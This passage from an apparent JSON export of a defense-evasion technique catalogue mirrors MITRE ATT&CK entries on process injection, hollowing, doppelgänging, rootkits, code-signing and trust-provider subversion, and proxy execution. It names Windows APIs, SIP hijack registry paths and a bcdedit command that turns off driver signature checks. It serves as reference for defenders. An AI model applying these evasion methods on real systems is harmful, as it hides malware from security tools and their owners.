"unprotect_id": "T1055.002",
"name": "Process Injection: Portable Executable Injection",
"description": "Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process.\r\n\r\nPE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. \r\n\r\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process.",
"resources": "https://attack.mitre.org/techniques/T1055/002/",
"creation_date": "2023-02-16T00:25:09.855000Z",
"tags": "Defense Evasion, \r\nPrivilege Escalation,\r\nexecuting arbitrary code in live process,\r\nvirtual address space,\r\nVirtualAllocEx,\r\nWriteProcessMemory,\r\nCreateRemoteThread,",
"modification_date": "2023-10-04T10:44:16.090000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 304,
"key": "process-injection-thread-execution-hijacking",
"unprotect_id": "T1055.003",
"name": "Process Injection: Thread Execution Hijacking",
"description": "Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process.\r\n\r\nThread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point the process can be suspended then written to, realigned to the injected code, and resumed via SuspendThread , VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.\r\n\r\nThis is very similar to Process Hollowing but targets an existing process rather than creating a process in a suspended state.\r\n\r\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process.",
"resources": "https://attack.mitre.org/techniques/T1055/003/",
"creation_date": "2023-02-24T03:21:21.181000Z",
"tags": "Defense Evasion, \r\nPrivilege Escalation,\r\nevade process-based defenses,\r\nOpenThread,\r\nSuspendThread,\r\nVirtualAllocEx,\r\nWriteProcessMemory,\r\nSetThreadContext, \r\nResumeThread,\r\nexisting process,\r\nmimic legitimate process,",
"modification_date": "2023-10-04T10:42:44.290000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 305,
"key": "process-injection-asynchronous-procedure-call",
"unprotect_id": "T1055.004",
"name": "Process Injection: Asynchronous Procedure Call",
"description": "Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process.\r\n\r\nAPC injection is commonly performed by attaching malicious code to the APC Queue of a process's thread. Queued APC functions are executed when the thread enters an alterable state. A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point QueueUserAPC can be used to invoke a function (such as LoadLibrayA pointing to a malicious DLL).\r\n\r\nA variation of APC injection, dubbed \"Early Bird injection\", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. AtomBombing is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.\r\n\r\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process.",
"resources": "https://attack.mitre.org/techniques/T1055/004/",
"creation_date": "2023-02-24T03:30:19.124000Z",
"tags": "Defense Evasion, \r\nPrivilege Escalation,\r\nasynchronous procedure call (APC) queue,\r\nevade process-based defenses,\r\nprivilege elevation,\r\nmimic legitimate process,\r\nAPC injection,\r\nOpenThread,\r\nQueueUserAPC,\r\nLoadLibrayA,\r\nEarly Bird injection,\r\nAtomBombing,\r\nmalicious code injection,",
"modification_date": "2023-10-04T10:44:29.416000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 306,
"key": "process-injection-thread-local-storage",
"unprotect_id": "T1055.005",
"name": "Process Injection: Thread Local Storage",
"description": "Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process.\r\n\r\nTLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process’ memory space using other Process Injection techniques such as Process Hollowing.\r\n\r\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process.",
"resources": "https://attack.mitre.org/techniques/T1055/005/",
"creation_date": "2023-02-24T03:34:35.743000Z",
"tags": "Defense Evasion, \r\nPrivilege Escalation,\r\nthread local storage (TLS) callbacks,\r\nevade process-based defenses,\r\nprivilege escalation,\r\nmimic legitimate process,\r\nprocess injection,",
"modification_date": "2023-10-04T10:42:48.678000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 307,
"key": "process-injection-extra-window-memory-injection",
"unprotect_id": "T1055.011",
"name": "Process Injection: Extra Window Memory Injection",
"description": "Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.\r\n\r\nBefore creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data). Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. \r\n\r\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.\r\n\r\nExecution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread. More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process.\r\n\r\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process.",
"resources": "https://attack.mitre.org/techniques/T1055/011/",
"creation_date": "2023-02-24T03:54:55.312000Z",
"tags": "Defense Evasion, \r\nPrivilege Escalation.\r\nmalicious code injection,\r\nmemory access,\r\nevade process-based defenses,\r\nprivilege escalation,\r\nwriting payloads to shared sections,\r\noverwrite function pointer,",
"modification_date": "2023-10-04T10:44:16.353000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 308,
"key": "process-injection-process-hollowing",
"unprotect_id": "T1055.012",
"name": "Process Injection: Process Hollowing",
"description": "Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.\r\n\r\nProcess hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as CreateProcess, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection before being written to, realigned to the injected code, and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.\r\n\r\nThis is very similar to Thread Local Storage but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process.",
"resources": "https://attack.mitre.org/techniques/T1055/012/",
"creation_date": "2023-02-24T03:59:59.456000Z",
"tags": "Defense Evasion, \r\nPrivilege Escalation,\r\ninject suspended and hollowed processes,\r\nCreateProcess,\r\nZwUnmapViewOfSection,\r\nNtUnmapViewOfSection,\r\nVirtualAllocEx, \r\nWriteProcessMemory, \r\nSetThreadContext, \r\nResumeThread,\r\nreallocating space with malicious code,\r\npermission inheritance,",
"modification_date": "2023-10-04T10:44:16.612000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 309,
"key": "process-injection-process-doppelganging",
"unprotect_id": "T1055.013",
"name": "Process Injection: Process Doppelgänging",
"description": "Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process.\r\n\r\nWindows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction.\r\n\r\nAlthough deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. \r\n\r\nAdversaries may abuse TxF to a perform a file-less variation of Process Injection. Similar to Process Hollowing, process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext.\r\n\r\nProcess Doppelgänging is implemented in 4 steps:\r\n\r\nTransact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.\r\nLoad – Create a shared section of memory and load the malicious executable.\r\nRollback – Undo changes to original executable, effectively removing malicious code from the file system.\r\nAnimate – Create a process from the tainted section of memory and initiate execution.\r\nThis behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process.",
"resources": "https://attack.mitre.org/techniques/T1055/013/",
"creation_date": "2023-02-24T04:06:01.468000Z",
"tags": "Defense Evasion, \r\nPrivilege Escalation,\r\nWindows Transactional NTFS (TxF),\r\nTxF application programming interface (API),\r\nfile-less variation of Process Injection,\r\nreplacing memory of a legitimate process with malicious code,\r\nTxF transaction,\r\nevade detection from security products, \r\nmimic legitimate process,\r\nabuse NTFS transactions,",
"modification_date": "2023-10-04T10:44:17.444000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 310,
"key": "process-injection-listplanting",
"unprotect_id": "T1055.015",
"name": "Process Injection: ListPlanting",
"description": "Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.\r\n\r\nList-view controls are user interface windows used to display collections of items. Information about an application's list-view settings are stored within the process' memory in a SysListView32 control.\r\n\r\nListPlanting (a form of message-passing \"shatter attack\") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items. Adversaries must first copy code into the target process’ memory space, which can be performed various ways including by directly obtaining a handle to the SysListView32 child of the victim process window (via Windows API calls such as FindWindow and/or EnumWindows) or other Process Injection methods.\r\n\r\nSome variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored WriteProcessMemory function. For example, an adversary can use the PostMessage and/or SendMessage API functions to send LVM_SETITEMPOSITION and LVM_GETITEMPOSITION messages, effectively copying a payload 2 bytes at a time to the allocated memory.\r\n\r\nFinally, the payload is triggered by sending the LVM_SORTITEMS message to the SysListView32 child of the process window, with the payload within the newly allocated buffer passed and executed as the ListView_SortItems callback.",
"resources": "https://attack.mitre.org/techniques/T1055/015/",
"creation_date": "2023-02-24T04:11:30.064000Z",
"tags": "Defense Evasion, \r\nPrivilege Escalation,\r\ninject malicious code into hijacked processes,\r\nevade detection from security products,\r\nSysListView32 control,\r\nmessage-passing shatter attack\r\ncustom callback,\r\nFindWindow,\r\nEnumWindows,\r\nwindow messages,\r\nLVM_SETITEMPOSITION message,\r\nLVM_GETITEMPOSITION message,\r\nLVM_SORTITEMS message,\r\nListView_SortItems callback,\r\nWriteProcessMemory function,",
"modification_date": "2023-10-04T10:44:02.072000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 311,
"key": "reflective-code-loading",
"unprotect_id": "T1620",
"name": "Reflective Code Loading",
"description": "Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk. Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).\r\n\r\nReflective code injection is very similar to Process Injection except that the \"injection\" loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.",
"resources": "https://attack.mitre.org/techniques/T1620/",
"creation_date": "2023-02-24T04:14:52.913000Z",
"tags": "Defense Evasion,\r\nmalicious code injection,\r\nexecuting payloads directly within process memory,\r\ncompiled binaries, \r\nanonymous files (only present in RAM), \r\nfileless executable code,\r\nevade process-based detections,\r\nmimic legitimate process,\r\nencrypted payload,\r\nobfuscated payload,",
"modification_date": "2023-10-04T10:44:18.491000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 312,
"key": "rogue-domain-controller",
"unprotect_id": "T1207",
"name": "Rogue Domain Controller",
"description": "Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.\r\n\r\nRegistering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. \r\n\r\nThis technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform SID-History Injection and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence.",
"resources": "https://attack.mitre.org/techniques/T1207/",
"creation_date": "2023-02-24T04:20:52.927000Z",
"tags": "Defense Evasion,\r\nPersistence,\r\nActive Directory manipulation,\r\nDCShadow,\r\nmimic Domain Controller (DC),\r\nnTDSDSA object,\r\nprivilege elevation,\r\nKRBTGT hash,\r\nbypass system logging and security monitors,\r\nbypass security information and event management (SIEM),\r\nalter and delete replication and metadata,\r\nSID-History Injection,\r\nmanipulate AD objects,",
"modification_date": "2023-10-04T10:44:29.580000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 313,
"key": "rootkit",
"unprotect_id": "T1014",
"name": "Rootkit",
"description": "Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.\r\n\r\nRootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, network connections or System Firmware.",
"resources": "https://attack.mitre.org/techniques/T1014/",
"creation_date": "2023-02-24T04:26:41.720000Z",
"tags": "Defense Evasion,\r\nintercepting/hooking and modifying operating system API calls,\r\nhypervisor, \r\nMaster Boot Record, \r\nSystem Firmware,\r\nobfuscation of malware,\r\nobfuscation of payloads,\r\nobfuscation of system resource usage,\r\nAPT28,\r\npersistent remote access,",
"modification_date": "2023-10-04T10:44:05.739000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 314,
"key": "subvert-trust-controls-code-signing",
"unprotect_id": "T1553.002",
"name": "Subvert Trust Controls: Code Signing",
"description": "Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. The certificates used during an operation may be created, acquired, or stolen by the adversary. Unlike Invalid Code Signature, this activity will result in a valid signature.\r\n\r\nCode signing to verify software on first run can be used on modern Windows systems.\r\n\r\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system.",
"resources": "https://attack.mitre.org/techniques/T1553/002/",
"creation_date": "2023-03-04T00:24:59.655000Z",
"tags": "Defense Evasion,\r\nfalsification of trusted signatures,\r\ncode signing,\r\nfalsifying certificates,\r\nself signed digital certificates,\r\nfake certificates,\r\nvalid CA,\r\ninvalid certificates,\r\nrevoked certificates,\r\nstolen certificates,\r\nforged certificates,\r\nAPT29,\r\nAPT41,",
"modification_date": "2023-10-04T10:44:59.378000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 315,
"key": "subvert-trust-controls-sip-and-trust-provider-hijacking",
"unprotect_id": "T1553.003",
"name": "Subvert Trust Controls: SIP and Trust Provider Hijacking",
"description": "Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. \r\n\r\nBecause of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all) and are identified by globally unique identifiers (GUIDs).\r\n\r\nSimilar to Code Signing, adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by:\r\n\r\nModifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP [6] (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).\r\n\r\nModifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[WOW6432Node]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP [with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.\r\n\r\nModifying the DLL and Function Registry values in HKLM\\SOFTWARE[WOW6432Node]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).\r\nNote: The above hijacks are also possible without modifying the Registry via DLL Search Order Hijacking.\r\nHijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation.",
"resources": "https://attack.mitre.org/techniques/T1553/003/",
"creation_date": "2023-03-04T00:36:46.332000Z",
"tags": "Defense Evasion,\r\nmanipulate SIP,\r\nhijack SIP,\r\nmanipulate trust provider components,\r\nWindows Authenticode,\r\nWinVerifyTrust,\r\nsignature validation,\r\nSubject Interface Packages (SIPs),\r\nglobally unique identifiers (GUIDs),\r\nsubvert trust controls,\r\nbypass security policies,\r\nDll Registry value,\r\nFuncName Registry value,\r\nCryptSIPDllGetSignedDataMsg function,\r\nHKLM\\SOFTWARE[\\WOW6432Node]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg{SIP_GUID},\r\nHKLM\\SOFTWARE[WOW6432Node]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData{SIP_GUID},\r\nHKLM\\SOFTWARE[WOW6432Node]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy{trust provider GUID},\r\nenable persistent code execution,",
"modification_date": "2023-10-04T10:44:22.284000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 316,
"key": "subvert-trust-controls-install-root-certificate",
"unprotect_id": "T1553.004",
"name": "Subvert Trust Controls: Install Root Certificate",
"description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.\r\n\r\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.\r\n\r\nAtypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide Adversary-in-the-Middle capability for intercepting information transmitted over secure TLS/SSL communications.\r\n\r\nRoot certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.",
"resources": "https://attack.mitre.org/techniques/T1553/004/",
"creation_date": "2023-03-04T00:41:29.779000Z",
"tags": "Defense Evasion,\r\nroot certificate authority (CA),\r\ncloning root certificates,\r\nAdversary-in-the-Middle,\r\nroot CA,\r\nTrusted Publisher,\r\ncertutil,\r\nadd-trusted-cert,\r\ncertmgr.exe,",
"modification_date": "2023-10-04T10:42:58.127000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 317,
"key": "subvert-trust-controls-mark-of-the-web-bypass",
"unprotect_id": "T1553.005",
"name": "Subvert Trust Controls: Mark-of-the-Web Bypass",
"description": "Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW. Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.\r\n\r\nAdversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.",
"resources": "https://attack.mitre.org/techniques/T1553/005/",
"creation_date": "2023-03-04T00:46:07.229000Z",
"tags": "Defense Evasion,\r\nMark-of-the-Web (MOTW) controls,\r\nNTFS Alternate Data Stream (ADS),\r\nZone.Identifier,\r\nWindows Defender SmartScreen,\r\ncompressed/archive (.arj, .gzip) format,\r\ndisk image (.iso, .vhd) file format,\r\nAPT29,",
"modification_date": "2023-10-04T10:44:22.140000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 318,
"key": "subvert-trust-controls-code-signing-policy-modification",
"unprotect_id": "T1553.006",
"name": "Subvert Trust Controls: Code Signing Policy Modification",
"description": "Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system.\r\n\r\nSome of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows. Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.\r\n\r\nAdversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, Modify Registry, rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory. Examples of commands that can modify the code signing policy of a system include bcdedit.exe -set TESTSIGNING ON on Windows. Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.\r\n\r\nTo gain access to kernel memory to modify variables related to signature checks, such as modifying g_CiOptions to disable Driver Signature Enforcement, adversaries may conduct Exploitation for Privilege Escalation using a signed, but vulnerable driver.",
"resources": "https://attack.mitre.org/techniques/T1553/006/",
"creation_date": "2023-03-04T00:52:29.582000Z",
"tags": "Defense Evasion,\r\nexecution of unsigned code,\r\nexecution of self-signed code,\r\nDriver Signature Enforcement (DSE),\r\nbcdedit.exe -set TESTSIGNING ON,\r\ndisable RequireSigned,\r\ng_CiOptions,\r\nPrivilege Escalation,\r\nAPT39,\r\nenable TESTSIGNING,\r\ndisable driver signing verification,",
"modification_date": "2023-10-04T10:43:00.943000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 319,
"key": "system-binary-proxy-execution-compiled-html-file",
"unprotect_id": "T1218.001",
"name": "System Binary Proxy Execution: Compiled HTML File",
"description": "Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. CHM content is displayed using underlying components of the Internet Explorer browser loaded by the HTML Help executable program (hh.exe).\r\n\r\nA custom CHM file containing embedded payloads could be delivered to a victim then triggered by User Execution. CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe.",
"resources": "https://attack.mitre.org/techniques/T1218/001/",
"creation_date": "2023-03-04T23:21:47.629000Z",
"tags": "Defense Evasion,\r\nAPT38,\r\nAPT41,\r\nMicrosoft HTML Help system,\r\nhh.exe,\r\nbypass application application control,",
"modification_date": "2023-10-04T10:43:10.638000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 320,
"key": "system-binary-proxy-execution-control-panel",
"unprotect_id": "T1218.002",
"name": "System Binary Proxy Execution: Control Panel",
"description": "Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.\r\n\r\nControl Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.\r\n\r\nMalicious Control Panel items can be delivered via Phishing campaigns or executed as part of multi-stage malware. Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.\r\n\r\nAdversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.",
"resources": "https://attack.mitre.org/techniques/T1218/002/",
"creation_date": "2023-03-04T23:27:05.191000Z",
"tags": "Defense Evasion,\r\ncontrol.exe,\r\nControl Panel (.cpl)\r\nCPlApplet function,\r\nbypass application allow lists,\r\nbypass file extension allow lists,\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls,\r\nDllEntryPoint,",
"modification_date": "2023-10-04T10:43:16.676000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 321,
"key": "system-binary-proxy-execution-cmstp",
"unprotect_id": "T1218.003",
"name": "System Binary Proxy Execution: CMSTP",
